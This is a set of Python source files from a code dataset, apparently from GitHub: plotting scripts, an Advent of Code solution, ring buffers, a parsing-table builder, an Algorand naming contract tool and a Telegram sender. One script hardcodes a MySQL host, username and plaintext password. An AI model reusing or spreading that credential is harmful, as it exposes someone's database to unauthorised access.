k in valid_classes}\ntest_data = {k: dataset[k] for k in test_classes}\n\n# Count the number of annotations in each data set\ntrain_counts = {k: len(v) for k, v in train_data.items()}\nvalid_counts = {k: len(v) for k, v in valid_data.items()}\ntest_counts = {k: len(v) for k, v in test_data.items()}\n\ncounts_dict = {key: len(annotations) for key, annotations in dataset.items()}\n\ndef plot_freq_5_5():\n # Define the JSONL files\n jsonl_files = {\n 'Train': '/work3/s174450/data/pico-episode-data/inter/pico_5_5_train_50.jsonl',\n 'Dev': '/work3/s174450/data/pico-episode-data/inter/pico_5_5_dev_50.jsonl',\n 'Test': '/work3/s174450/data/pico-episode-data/inter/pico_5_5_test_50.jsonl'\n }\n\n counts_dict = {\n 'Train': train_counts,\n 'Dev': valid_counts,\n 'Test': test_counts\n }\n # Reverse the domain mapping to create an entity-domain mapping\n entity_domain_mapping = {entity: domain for domain, entities in domains.items() for entity in entities}\n # Initialize a dictionary for storing the domain counts\n domain_counts = {domain: [0, 0, 0] for domain in domains}\n # Parse the JSONL files\n for dataset, dict_counts in counts_dict .items():\n for key, item in dict_counts.items():\n if key in entity_domain_mapping:\n domain_counts[entity_domain_mapping[key]][list(counts_dict.keys()).index(dataset)] += item\n # for dataset, jsonl_file in jsonl_files.items():\n # with open(jsonl_file, 'r') as file:\n # for line in file:\n # # Parse the episode\n # episode = json.loads(line)\n # # Count the instances of each domain\n # for entity in episode['types']:\n # if entity in entity_domain_mapping:\n # domain_counts[entity_domain_mapping[entity]][list(jsonl_files.keys()).index(dataset)] += 10\n # Convert the domain count dictionary to a DataFrame\n pdb.set_trace()\n df = pd.DataFrame.from_dict(domain_counts, orient='index', columns=jsonl_files.keys())\n df = df.drop(\"O\", errors='ignore')\n # Create the bar plot\n df.plot(kind='bar', stacked=False, figsize=(10, 7), rot=0)\n\n # Set the title and labels\n plt.title(\"Fine-grained Counts in Different Datasets for 5-Way 5-Shots\")\n plt.xlabel(\"\")\n plt.ylabel(\"Number of unique annotations\")\n\n # Show the plot\n plt.savefig('images/barplot_5_1_50.png')\n\n\ndef plot_train_dev_test_freq():\n \"\"\"\n Plots the frequencies of annotations in the training, validation, and test datasets.\n\n The function takes three dictionaries as input: train_counts, valid_counts, and test_counts.\n Each dictionary contains keys representing different entities from the PICO dataset, and the\n values are the frequencies of annotations for each entity.\n\n The function generates three bar charts, one for each dataset, showing the frequencies of\n annotations for each entity.\n\n The resulting plots are saved as an image in the 'images' directory.\n\n Parameters:\n train_counts (dict): Dictionary containing frequencies of annotations in the training dataset.\n valid_counts (dict): Dictionary containing frequencies of annotations in the validation dataset.\n test_counts (dict): Dictionary containing frequencies of annotations in the test dataset.\n\n Returns:\n None\n \"\"\"\n # Plot the counts of annotations in each data set\n fig, ax = plt.subplots(3, 1, figsize=(10, 15))\n ax[0].bar(train_counts.keys(), train_counts.values())\n ax[0].set_title('Training Data')\n ax[0].set_ylabel('Frequency')\n ax[0].set_ylim([0, 1100])\n ax[0].set_xticklabels(train_counts.keys(), rotation=45, ha=\"right\") # Rotate x-axis labels\n\n ax[1].bar(valid_counts.keys(), valid_counts.values())\n 
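# Optionally rotate this panel's tick labels too, mirroring the ax[0] call above, so long class names stay readable.\n    ax[1].set_xticklabels(valid_counts.keys(), rotation=45, ha=\"right\")\n    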
ax[1].set_title('Validation Data')\n ax[1].set_ylabel('Frequency')\n ax[1].set_ylim([0, 1100])\n\n ax[2].bar(test_counts.keys(), test_counts.values())\n ax[2].set_title('Test Data')\n ax[2].set_ylabel('Frequency')\n ax[2].set_ylim([0, 1100])\n\n plt.tight_layout()\n plt.savefig('images/Freq.png')\n\ndef plot_all_freq():\n \"\"\"\n Plots a bar chart showing the number of text+annotations are available for each entity in PICO.\n\n The resulting plot is saved as an image in the 'images' directory.\n\n Parameters:\n counts_dict (dict): PICO data set dictionary with all entities.\n\n Returns:\n None\n \"\"\"\n keys = counts_dict.keys()\n values = counts_dict.values()\n\n plt.figure(figsize=(12, 6))\n plt.bar(keys, values)\n plt.xticks(rotation=90)\n plt.xlabel('Keys')\n plt.ylabel('Number of Items')\n plt.title('Number of Items in Each Key')\n plt.tight_layout()\n plt.savefig('images/all_freq.png')\n\ndef plot_text_length():\n \"\"\"\n Plots histograms of tokenized text lengths for training, validation, and testing datasets.\n\n The function extracts the text lengths from the provided data dictionaries and generates histograms\n to visualize the distribution of text lengths.\n\n The resulting histograms are saved as images in the 'images' directory.\n\n Parameters:\n train_data (dict): Dictionary containing training data.\n valid_data (dict): Dictionary containing validation data.\n test_data (dict): Dictionary containing testing data.\n\n Returns:\n None\n \"\"\"\n def extract_text_lengths(data):\n text_lengths = []\n for tuples_list in data.values():\n for item in tuples_list:\n for text, annotation in item:\n text_lengths.append(len(text))\n return text_lengths\n\n text_lengths_train = extract_text_lengths(train_data)\n text_lengths_dev = extract_text_lengths(valid_data)\n text_lengths_test = extract_text_lengths(test_data)\n\n def plot_histogram(text_lengths, title, file_type):\n plt.figure()\n plt.hist(text_lengths, bins=25, edgecolor='black')\n plt.xlabel('Text Length')\n plt.ylabel('Frequency')\n plt.title(title)\n plt.savefig(f'images/sequence_length_hist_{file_type}.png')\n\n plot_histogram(text_lengths_train, 'Histogram of Tokenized Text Lengths for Training', 'train')\n plot_histogram(text_lengths_dev, 'Histogram of Tokenized Text Lengths for Validation', 'dev')\n plot_histogram(text_lengths_test, 'Histogram of Tokenized Text Lengths for Testing', 'test')\n\ndef plot_pico_freq_jsonl():\n \"\"\"\n Plots the frequencies of annotation types in three JSONL files: pico_5_1_train.jsonl,\n pico_5_1_dev.jsonl, and pico_5_1_test.jsonl.\n\n The function reads the JSONL files, extracts the annotation types, counts their occurrences,\n and generates bar plots showing the frequencies for each file.\n\n The resulting plots are saved as images in the 'images' directory.\n\n Parameters:\n None\n\n Returns:\n None\n \"\"\"\n # Step 1: Read the JSONL files and parse them into dictionaries\n data_train, data_dev, data_test = [], [], []\n\n with open(\"data/pico-episode-data/pico_5_1_train.jsonl\", \"r\") as file:\n for line in file:\n data_train.append(json.loads(line))\n\n with open(\"data/pico-episode-data/pico_5_1_dev.jsonl\", \"r\") as file:\n for line in file:\n data_dev.append(json.loads(line))\n\n with open(\"data/pico-episode-data/pico_5_1_test.jsonl\", \"r\") as file:\n for line in file:\n data_test.append(json.loads(line))\n\n # Step 2: Extract the annotation types\n def extract_annotation_types(data):\n annotation_types = []\n for entry in data:\n annotation_types.extend(entry[\"types\"])\n 
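# Duplicates are kept here, so the Counter calls below count every occurrence of a type.\n        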
return annotation_types\n\n    annotation_types_train = extract_annotation_types(data_train)\n    annotation_types_dev = extract_annotation_types(data_dev)\n    annotation_types_test = extract_annotation_types(data_test)\n    pdb.set_trace()\n    # Step 3: Count the occurrences of each annotation type\n    type_counts_train = Counter(annotation_types_train)\n    type_counts_dev = Counter(annotation_types_dev)\n    type_counts_test = Counter(annotation_types_test)\n\n    # Step 4: Plot the annotation types and their frequencies\n    def plot_annotation_types(type_counts, title, type):\n        types = type_counts.keys()\n        counts = type_counts.values()\n        plt.figure()\n        plt.bar(types, counts)\n        plt.xlabel(\"Annotation Types\")\n        plt.ylabel(\"Frequency\")\n        plt.title(title)\n        plt.xticks(rotation=45)\n        plt.tight_layout()\n        plt.savefig(f'images/pico_freq_jsonl_{type}.png')\n\n    plot_annotation_types(type_counts_train, \"Annotation Type Frequencies (Train)\", 'train')\n    plot_annotation_types(type_counts_dev, \"Annotation Type Frequencies (Dev)\", 'dev')\n    plot_annotation_types(type_counts_test, \"Annotation Type Frequencies (Test)\", 'test')\n\n\nif __name__ == '__main__':\n    domains = json.load(open(\"/work3/s174450/data/entity_types_pico.json\"))\n    plot_freq_5_5()\n","repo_name":"DeterjoSimon/NER_project","sub_path":"freq_plot.py","file_name":"freq_plot.py","file_ext":"py","file_size_in_byte":9818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31736723552","text":"from collections import defaultdict\nfrom pathlib import Path\n\nhere = Path(__file__).parent\n\ngrid = []\nfp = open(here / 'input.txt', 'r')\nfor line in fp:\n    row = []\n    for c in line.strip():\n        row.append(int(c))\n    grid.append(row)\nfp.close()\n\n\nmaxEachDirection = defaultdict(list)\n# l, r, u, d\n\nROWS, COLS = len(grid), len(grid[0])\n\nfor r in range(ROWS):\n    maxValues = [-1] * ROWS\n    for c in range(COLS):\n        maxEachDirection[(r, c)].append(maxValues[r])\n        maxValues[r] = max(maxValues[r], grid[r][c])\n\n    maxValues = [-1] * ROWS\n    for c in range(COLS - 1, -1, -1):\n        maxEachDirection[(r, c)].append(maxValues[r])\n        maxValues[r] = max(maxValues[r], grid[r][c])\n\nfor c in range(COLS):\n    maxValues = [-1] * COLS\n    for r in range(ROWS):\n        maxEachDirection[(r, c)].append(maxValues[c])\n        maxValues[c] = max(maxValues[c], grid[r][c])\n\n    maxValues = [-1] * COLS\n    for r in range(ROWS - 1, -1, -1):\n        maxEachDirection[(r, c)].append(maxValues[c])\n        maxValues[c] = max(maxValues[c], grid[r][c])\n\ncount = 0\nfor r in range(ROWS):\n    for c in range(COLS):\n        minSurrounding = min(maxEachDirection[(r, c)])\n        visible = False\n        if grid[r][c] > minSurrounding:\n            count += 1\n            visible = True\n        # print(f\"{grid[r][c]} vs {minSurrounding} {visible}\", end=\" | \")\n    print()\n\nprint(count)","repo_name":"kingstarfly/aoc2022","sub_path":"8/one.py","file_name":"one.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20338537192","text":"class FirstCircBuf:\n    \"\"\"Ring buffer class.\n    Pros: simple and readable\n    Cons: once the buffer wraps around, the index values\n    (the tail_index and head_index variables) follow one another,\n    pointing at the same value, so one of the two could be dropped\n\n    >>> buffer = FirstCircBuf(4)\n    >>> buffer.enqueue(1)\n    >>> buffer.enqueue(2)\n    >>> buffer.enqueue(3)\n    >>> buffer.enqueue(4)\n    >>> buffer.enqueue(5)\n    >>> buffer.enqueue(6)\n    >>> buffer.enqueue(7)\n    
>>> buffer.enqueue(8)\n    >>> buffer.dequeue(3)\n    [5, 6, 7]\n    \"\"\"\n    def __init__(self, capacity: int):\n        self.buffer: list = []\n        self.capacity = capacity\n        self.head_index = self.tail_index = 0\n\n    def enqueue(self, num: int):\n\n        if self.tail_index >= self.capacity:\n            self.buffer[self.tail_index % self.capacity] = num\n\n        elif self.tail_index < self.capacity:\n            self.buffer.append(num)\n\n        self.tail_index += 1\n\n        if len(self.buffer) == self.capacity:\n            self.head_index = self.tail_index % self.capacity\n\n    def dequeue(self, size_to_read: int):\n        if size_to_read > len(self.buffer):\n            return None\n\n        result_to_read = []\n\n        index = self.head_index\n        while size_to_read > 0 and index < len(self.buffer):\n            result_to_read.append(self.buffer[index])\n            index += 1\n            size_to_read -= 1\n        index = 0\n\n        while index < size_to_read:\n            result_to_read.append(self.buffer[index])\n            index += 1\n        return result_to_read\n\n\nclass SecondCircBuf:\n    \"\"\"Ring buffer class.\n    Pros: carries no redundant variables\n    Cons: explicit is better than implicit\n\n    >>> buffer = SecondCircBuf(4)\n    >>> buffer.enqueue(1)\n    >>> buffer.enqueue(2)\n    >>> buffer.enqueue(3)\n    >>> buffer.enqueue(4)\n    >>> buffer.enqueue(5)\n    >>> buffer.enqueue(6)\n    >>> buffer.enqueue(7)\n    >>> buffer.enqueue(8)\n    >>> buffer.dequeue(3)\n    [5, 6, 7]\n    \"\"\"\n    def __init__(self, capacity: int):\n        self.buffer: list = []\n        self.capacity = capacity\n        self.tail_index = 0\n\n    def enqueue(self, num: int):\n\n        if self.tail_index >= self.capacity:\n            self.buffer[self.tail_index % self.capacity] = num\n\n        elif self.tail_index < self.capacity:\n            self.buffer.append(num)\n\n        self.tail_index += 1\n\n    def dequeue(self, size: int):\n        if size > len(self.buffer):\n            return None\n\n        result_to_read = []\n\n        if len(self.buffer) < self.capacity:\n            for value in self.buffer:\n                result_to_read.append(value)\n            return result_to_read\n\n        index = self.tail_index % self.capacity\n        while size > 0 and index < len(self.buffer):\n            result_to_read.append(self.buffer[index])\n            index += 1\n            size -= 1\n\n        index = 0\n        while index < size:\n            result_to_read.append(self.buffer[index])\n            index += 1\n\n        return result_to_read\n\n\nif __name__ == '__main__':\n    import doctest\n    doctest.testmod()\n","repo_name":"buschwaker/wargaming","sub_path":"tasks/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12218484360","text":"\"\"\"Compares changes between remote and local data, allowing the user to make decisions.\"\"\"\nfrom collections import OrderedDict, defaultdict\n\nfrom loguru import logger\nfrom rich.console import Console\nfrom rich.prompt import Confirm, Prompt\nfrom rich.table import Table\n\nfrom qw.design_stages.main import DesignStages, get_local_stages, get_remote_stages\nfrom qw.local_store.main import LocalStore\nfrom qw.remote_repo.service import GitService\n\n\nclass ChangeHandler:\n    \"\"\"Allow user interaction to manage changes between local and remote design stage data.\"\"\"\n\n    def __init__(self, service: GitService, store: LocalStore):\n        \"\"\"Create ChangeHandler instance.\"\"\"\n        self._service = service\n        self._store = store\n\n    def combine_local_and_remote_items(self) -> list[DesignStages]:\n        \"\"\"Compare local and remote design stages and prompt on any differences.\"\"\"\n        paired = self._pair_remote_and_local()\n\n        output_items = []\n        for _internal_id, pair in paired.items():\n            remote_item: DesignStages | None = 
pair.get(\"remote\")\n local_item: DesignStages | None = pair.get(\"local\")\n if not local_item:\n logger.info(\n f\"New remote item: {remote_item} will be saved to local store.\",\n )\n output_items.append(remote_item)\n continue\n\n if not remote_item:\n output_items.extend(self._prompt_to_remove_local_item(local_item))\n continue\n\n diff = local_item.diff(remote_item)\n if not diff:\n output_items.append(local_item)\n continue\n\n output_items.append(\n self._prompt_for_version_change(\n diff,\n local_item,\n remote_item,\n ),\n )\n\n return output_items\n\n def _pair_remote_and_local(self) -> dict[int, dict[str, DesignStages]]:\n paired_data: dict[int, dict[str, DesignStages]] = defaultdict(dict)\n\n for stage in get_remote_stages(self._service):\n paired_data[stage.internal_id][\"remote\"] = stage\n\n for stage in get_local_stages(self._store):\n paired_data[stage.internal_id][\"local\"] = stage\n\n return OrderedDict(sorted(paired_data.items()))\n\n @staticmethod\n def _prompt_to_remove_local_item(local_item) -> list[DesignStages]:\n if Confirm.ask(\n f\"{local_item} no longer exists in remote, would you like to remove it from the local store?\",\n ):\n return []\n return [local_item]\n\n def _prompt_for_version_change(\n self,\n diff: dict[str, dict],\n local_item: DesignStages,\n remote_item: DesignStages,\n ):\n table = Table(\n title=f\"Changes detected for {local_item}:\",\n show_lines=True,\n expand=True,\n )\n table.add_column(\"Field\", justify=\"right\", style=\"cyan\")\n table.add_column(\"Local\", justify=\"left\", style=\"magenta\")\n table.add_column(\n f\"{self._service.username}/{self._service.reponame}\",\n justify=\"left\",\n style=\"green\",\n )\n for field, differences in diff.items():\n table.add_row(field, differences[\"self\"], differences[\"other\"])\n\n console = Console()\n console.print(table)\n prompt = \"\\n\".join(\n [\n \"Would you like to:\",\n \"n (Don't save the update)\",\n \"u (Update, but trivial change so don't increment the version)\",\n \"i (Update and increment the version)\",\n \"\",\n ],\n )\n\n response = Prompt.ask(prompt, choices=[\"n\", \"u\", \"i\"])\n if response == \"n\":\n return local_item\n if response == \"u\":\n return remote_item\n remote_item.version += 1\n return remote_item\n","repo_name":"UCL-ARC/qw","sub_path":"src/qw/changes.py","file_name":"changes.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"21406346138","text":"from toolkit.modules.make_follow_sets import follow_sets\nfrom toolkit.modules.make_first_sets import first_sets\nfrom toolkit.modules.grammar import is_terminal\nfrom tabulate import tabulate\n\n\ndef parsing_table(pgrammar, fs, fls, error_recovery=True):\n \"\"\"\n Input:\n pgrammar: parsed grammar\n fs: first sets\n fls: follow sets\n error_recovery: fill parsing table with pop/scan values for error cells\n \"\"\"\n\n # nonterminals with eps in their first sets\n nullables = [k for k in pgrammar.keys() if \"eps\" in fs[k]]\n\n # TODO: rewrite this loop better\n terminals = set()\n for prod in pgrammar.values():\n for rule in prod:\n for sym in rule.split():\n if is_terminal(sym, pgrammar) and sym != \"eps\":\n terminals.add(sym)\n\n if not terminals:\n return\n\n terminals = list(terminals)\n terminals.append(\"$\")\n\n table = []\n for nt, prod in pgrammar.items():\n row = [None] * len(terminals)\n for rule in prod:\n for sym in rule.split():\n eps = False\n if sym == \"eps\":\n eps = True\n else:\n 
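# A terminal symbol fills its table cell directly; a nonterminal contributes cells through its FIRST set.\n                    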
if is_terminal(sym, pgrammar):\n row[terminals.index(sym)] = \"{} -> {}\".format(nt, rule)\n else:\n for fse in fs[sym]:\n if fse == \"eps\":\n eps = True\n else:\n row[terminals.index(fse)] = \"{} -> {}\".format(nt, rule)\n\n if eps:\n for flse in fls[nt]:\n row[terminals.index(flse)] = \"{} -> {}\".format(nt, rule)\n\n if not eps and sym not in nullables:\n break\n\n table.append([nt] + row)\n\n if error_recovery:\n for row in table:\n # row[0] is the non-terminal\n for flse in fls[row[0]]:\n # + 1 because we also added a non-terminal\n ix = terminals.index(flse) + 1\n if row[ix] is None:\n row[ix] = \"Pop({})\".format(row[0])\n\n # fill remaining values with 'scan'\n for i in range(1, len(row)):\n if row[i] is None:\n row[i] = \"scan\"\n\n return tabulate(table, headers=[\"input\"] + terminals)\n\n\n# if __name__ == \"__main__\":\n# import grammar as gm\n\n# # grammar = \"\"\"\n# # X -> a X | g | Y Z | eps\n# # Y -> d | u Y | eps\n# # Z -> i | eps\n# # \"\"\"\n\n# grammar = \"\"\"\n# E -> T E'\n# E' -> + T E' | eps\n# T -> F T'\n# T' -> * F T' | eps\n# F -> id | ( E )\n# \"\"\"\n\n# pgrammar = gm.parse(grammar)\n\n# fs = first_sets(pgrammar)\n# fls = follow_sets(\"E\", pgrammar, fs)\n\n# # print(\"first sets:\")\n# # gm.set_print(fs)\n# # print(\"follow sets:\")\n# # gm.set_print(fls)\n\n# make_parsing_table(pgrammar, fs, fls)\n","repo_name":"candh/compiler-toolkit","sub_path":"toolkit/modules/make_parsing_table.py","file_name":"make_parsing_table.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"11479307327","text":"\nimport _mysql\nimport os\nimport os.path\n\ndb = _mysql.connect(host = \"acbbdb1.picr.man.ac.uk\", user = \"nsmd\", passwd = \"nsmdP123\", db = \"nsmd\")\ndata_root = \"/data/snc/nstephenson/nsmd/results\"\n\ndirs = os.listdir(data_root)\n\ndef is_numerical_dir(name):\n\n fullname = os.path.join(data_root, name)\n if not os.path.isdir(fullname):\n return False\n try:\n n = int(name)\n return True\n except ValueError:\n return False\n\ndirs = filter(is_numerical_dir, dirs)\n\nfor d in dirs:\n \n db.query(\"select gene, mutation from sequences inner join kinases on kinaseid = kinases.id inner join genes on gene_id = genes.id where sequences.id = %s\" % d)\n rows = db.store_result().fetch_row(maxrows=0)\n\n if len(rows) == 0:\n print >>sys.stderr, \"Ignore directory\", d, \"not in DB\"\n continue\n elif len(rows) > 1:\n raise Exception(\"Duplicate entries in DB for %s\" % d)\n\n protdir = os.path.join(data_root, \"by-protein\", rows[0][0])\n try:\n os.makedirs(protdir)\n except OSError as e:\n if e.errno != 17: # Already exists\n raise e\n \n linkname = os.path.join(protdir, rows[0][1].replace(\" \", \"_\"))\n\n try:\n os.symlink(os.path.join(data_root, d), linkname)\n except OSError as e:\n if e.errno != 17:\n raise e\n\n","repo_name":"natalie-stephenson/Kinase-Structure-Mutational-Screen","sub_path":"update-links.py","file_name":"update-links.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"45536025427","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom codecs import open\nimport os\nimport re\n\nfrom setuptools import find_packages, setup\n\n\ncurrent_dir = os.path.dirname(os.path.realpath(__file__))\nwith open('README.rst', encoding='utf-8') as readme_file:\n readme = readme_file.read()\n\n\ndef get_meta():\n meta_re = re.compile(r\"(?P<name>__\\w+__) 
= '(?P<value>[^']+)'\")\n meta_d = {}\n with open(os.path.join(current_dir, 'aiobearychat/__init__.py'),\n encoding='utf8') as fp:\n for match in meta_re.finditer(fp.read()):\n meta_d[match.group('name')] = match.group('value')\n return meta_d\n\n\nrequirements = [\n 'attrs',\n]\n\nextras_require = {\n '': requirements,\n 'aiohttp': 'aiohttp',\n}\n\nmeta_d = get_meta()\nsetup(\n name='aiobearychat',\n version=meta_d['__version__'],\n description='BearyChat 异步 Python SDK',\n long_description=readme,\n author='mozillazg',\n author_email='mozillazg101@gmail.com',\n url='https://github.com/mozillazg/aiobearychat',\n packages=find_packages(\n exclude=['*.tests', '*.tests.*', 'tests.*', 'tests']\n ),\n package_dir={'aiobearychat':\n 'aiobearychat'},\n include_package_data=True,\n install_requires=requirements,\n extras_require=extras_require,\n license='MIT',\n zip_safe=False,\n keywords='aiobearychat',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: Implementation :: CPython',\n ],\n)\n","repo_name":"mozillazg/aiobearychat","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"39862261289","text":"import base64\nimport sys\n\nfrom algosdk import encoding\nfrom algosdk.constants import MIN_TXN_FEE\nfrom algosdk.future import template, transaction\nimport click\nfrom pyteal import *\n\nfrom algovault.client import get_algod, get_kmd, raw_signing_address, sha512_256\n\n# testnet app id\nDEFAULT_APP_ID = 46576018\n# 16 local bytes keys + 100k opt-in balance + 100k base balance\nMINIMUM_BALANCE = 16 * 50000 + 100000 + 100000\nMINIMUM_TXN_FEE = 1000\n\n\ndef _lsig(program, txn):\n return transaction.LogicSigTransaction(txn, transaction.LogicSigAccount(program))\n\n\ndef _approval_program():\n success = Return(Int(1))\n on_set = Seq(\n [\n App.localPut(\n Txn.sender(), Txn.application_args[1], Txn.application_args[2]\n ),\n Return(Int(1)),\n ]\n )\n on_noop = Cond([Txn.application_args[0] == Bytes(\"Set\"), on_set])\n program = Cond(\n [Txn.application_id() == Int(0), success],\n [Txn.on_completion() == OnComplete.OptIn, success],\n [Txn.on_completion() == OnComplete.CloseOut, success],\n [Txn.on_completion() == OnComplete.NoOp, on_noop],\n )\n return compileTeal(program, Mode.Application, version=5)\n\n\ndef _clear_state_program():\n program = Return(Int(1))\n return compileTeal(program, Mode.Application, version=5)\n\n\nclass NamedAccount(template.Template):\n def __init__(self, name_service_id, name):\n self.name_service_id = name_service_id\n if isinstance(name, str):\n name = name.encode(\"utf-8\")\n self.name = name\n\n def get_program(self):\n program = bytearray()\n # version\n template.put_uvarint(program, 5)\n program.append(0x80) # pushbytes\n template.put_uvarint(program, 32)\n program.extend(sha512_256(self.name))\n program.append(0x81) # pushint\n template.put_uvarint(program, self.name_service_id)\n # pop; pop; pushint 1\n program.extend([0x48, 0x48, 0x81, 0x01])\n return bytes(program)\n\n def initialize(self, sp, funding_address, update_authority):\n acl = get_algod()\n program = self.get_program()\n addr = self.get_address()\n fund_txn = transaction.PaymentTxn(\n funding_address, sp, 
addr, MINIMUM_BALANCE + MIN_TXN_FEE\n )\n optin_txn = transaction.ApplicationOptInTxn(\n addr, sp, DEFAULT_APP_ID, rekey_to=update_authority\n )\n group = [fund_txn, optin_txn]\n transaction.assign_group_id(group)\n return (fund_txn, _lsig(program, optin_txn))\n\n def update_data(self, sp, data_index, data):\n return transaction.ApplicationCallTxn(\n self.get_address(),\n sp,\n DEFAULT_APP_ID,\n transaction.OnComplete.NoOpOC.real,\n app_args=[b\"Set\", data_index, data],\n )\n\n def close(self, sp, remainder_to):\n close_out = transaction.ApplicationCloseOutTxn(\n self.get_address(), sp, DEFAULT_APP_ID\n )\n payback = transaction.PaymentTxn(\n self.get_address(),\n sp,\n self.get_address(),\n 0,\n close_remainder_to=remainder_to,\n )\n transaction.assign_group_id([close_out, payback])\n return close_out, payback\n\n\n@click.group(\"name\")\ndef command_group():\n pass\n\n\n@command_group.command(\"deploy\")\ndef name_deploy():\n kcl = get_kmd()\n acl = get_algod()\n wallets = kcl.list_wallets()\n wallet_handle = kcl.init_wallet_handle(wallets[0][\"id\"], \"\")\n creator = kcl.list_keys(wallet_handle)[0]\n approval_bytecode = acl.compile(_approval_program())\n clear_state_bytecode = acl.compile(_clear_state_program())\n suggested_params = acl.suggested_params()\n global_schema = transaction.StateSchema(0, 0)\n local_schema = transaction.StateSchema(0, 16)\n txn = transaction.ApplicationCreateTxn(\n creator,\n suggested_params,\n transaction.OnComplete.NoOpOC.real,\n base64.b64decode(approval_bytecode[\"result\"]),\n base64.b64decode(clear_state_bytecode[\"result\"]),\n global_schema,\n local_schema,\n )\n signed_txn = kcl.sign_transaction(wallet_handle, \"\", txn)\n acl.send_transaction(signed_txn)\n transaction.wait_for_confirmation(acl, signed_txn.get_txid(), 5)\n transaction_response = acl.pending_transaction_info(signed_txn.get_txid())\n app_id = transaction_response[\"application-index\"]\n print(\"Created new app-id:\", app_id)\n\n\n@command_group.command(\"create\")\n@click.argument(\"name\")\n@click.argument(\"authority\")\ndef name_create(name, authority):\n acl = get_algod()\n kcl = get_kmd()\n acct = NamedAccount(DEFAULT_APP_ID, name)\n suggested_params = acl.suggested_params()\n wallets = kcl.list_wallets()\n wallet_handle = kcl.init_wallet_handle(wallets[0][\"id\"], \"\")\n fund, optin = acct.initialize(suggested_params, authority, authority)\n signed_fund = kcl.sign_transaction(wallet_handle, \"\", fund)\n group_txid = acl.send_transactions([signed_fund, optin])\n transaction.wait_for_confirmation(acl, group_txid, 5)\n pass\n\n\n@command_group.command(\"delete\")\n@click.argument(\"signer\")\n@click.argument(\"receiver\")\n@click.argument(\"name\")\ndef name_delete(signer, receiver, name):\n acl = get_algod()\n kcl = get_kmd()\n acct = NamedAccount(DEFAULT_APP_ID, name)\n suggested_params = acl.suggested_params()\n wallets = kcl.list_wallets()\n wallet_handle = kcl.init_wallet_handle(wallets[0][\"id\"], \"\")\n close_out, payback = acct.close(suggested_params, receiver)\n signed_close_out = kcl.sign_transaction(\n wallet_handle, \"\", close_out, signing_address=raw_signing_address(signer)\n )\n signed_payback = kcl.sign_transaction(\n wallet_handle, \"\", payback, signing_address=raw_signing_address(signer)\n )\n txid = acl.send_transactions([signed_close_out, signed_payback])\n transaction.wait_for_confirmation(acl, txid, 
5)\n\n\n@command_group.command(\"update\")\n@click.argument(\"signer\")\n@click.argument(\"name\")\n@click.argument(\"index\")\n@click.argument(\"data\")\ndef name_update(signer, name, index, data):\n acl = get_algod()\n kcl = get_kmd()\n acct = NamedAccount(DEFAULT_APP_ID, name)\n suggested_params = acl.suggested_params()\n wallets = kcl.list_wallets()\n wallet_handle = kcl.init_wallet_handle(wallets[0][\"id\"], \"\")\n txn = acct.update_data(\n suggested_params, index.encode(\"utf-8\"), data.encode(\"utf-8\")\n )\n signed_txn = kcl.sign_transaction(\n wallet_handle,\n \"\",\n txn,\n signing_address=raw_signing_address(signer),\n )\n acl.send_transaction(signed_txn)\n transaction.wait_for_confirmation(acl, signed_txn.get_txid(), 5)\n\n\n@command_group.command(\"get\")\n@click.argument(\"name\")\n@click.argument(\"index\")\ndef name_get(name, index):\n acl = get_algod()\n acct = NamedAccount(DEFAULT_APP_ID, name)\n info = acl.account_info(acct.get_address())\n b64_index = base64.b64encode(index.encode(\"utf-8\")).decode(\"utf-8\")\n for app_state in info[\"apps-local-state\"]:\n if app_state[\"id\"] == DEFAULT_APP_ID:\n if \"key-value\" in app_state:\n for key_value in app_state[\"key-value\"]:\n if key_value[\"key\"] == b64_index:\n print(\n base64.b64decode(key_value[\"value\"][\"bytes\"]).decode(\n \"utf-8\"\n )\n )\n return\n click.echo(\"couldn't find a value for the given key\", err=True)\n sys.exit(1)\n","repo_name":"eiz/algovault","sub_path":"algovault/naming.py","file_name":"naming.py","file_ext":"py","file_size_in_byte":7549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73896709921","text":"#\n# Simple Telegram Messenger\n# @author: bartjan@pc-mania.nl\n# Jun-21,2019\n#\n# https://github.com/barreljan/Telegram\n\nimport requests\n\n\nclass Messenger(object):\n def __init__(self, bot_id=\"\", chat_id=\"\"):\n if not bot_id:\n raise SystemExit('Missing `bot_id` during initiate')\n if not chat_id:\n raise SystemExit('Missing `chat_id` during initiate')\n self.api_bot_id = str(bot_id)\n self.api_chat_id = str(chat_id)\n self.api_endpoint = 'https://api.telegram.org/{}/sendMessage'.format(self.api_bot_id)\n\n def send(self, msg=\"\"):\n if msg:\n _msg = str(msg)\n else:\n raise SystemExit('Message can not be empty')\n\n post_data = {'chat_id': self.api_chat_id,\n 'text': _msg}\n try:\n requests.post(url=self.api_endpoint, data=post_data)\n except:\n raise SystemExit('Something went wrong or can not connect to API...')\n\n","repo_name":"barreljan/Telegram","sub_path":"Telegram.py","file_name":"Telegram.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"21434419040","text":"def jobScheduling(jobs):\n \n # Write your code here\n # Return an integer denoting the maximum pofit \n n = len(jobs)\n jobs = sorted(jobs, key = lambda x: x[2], 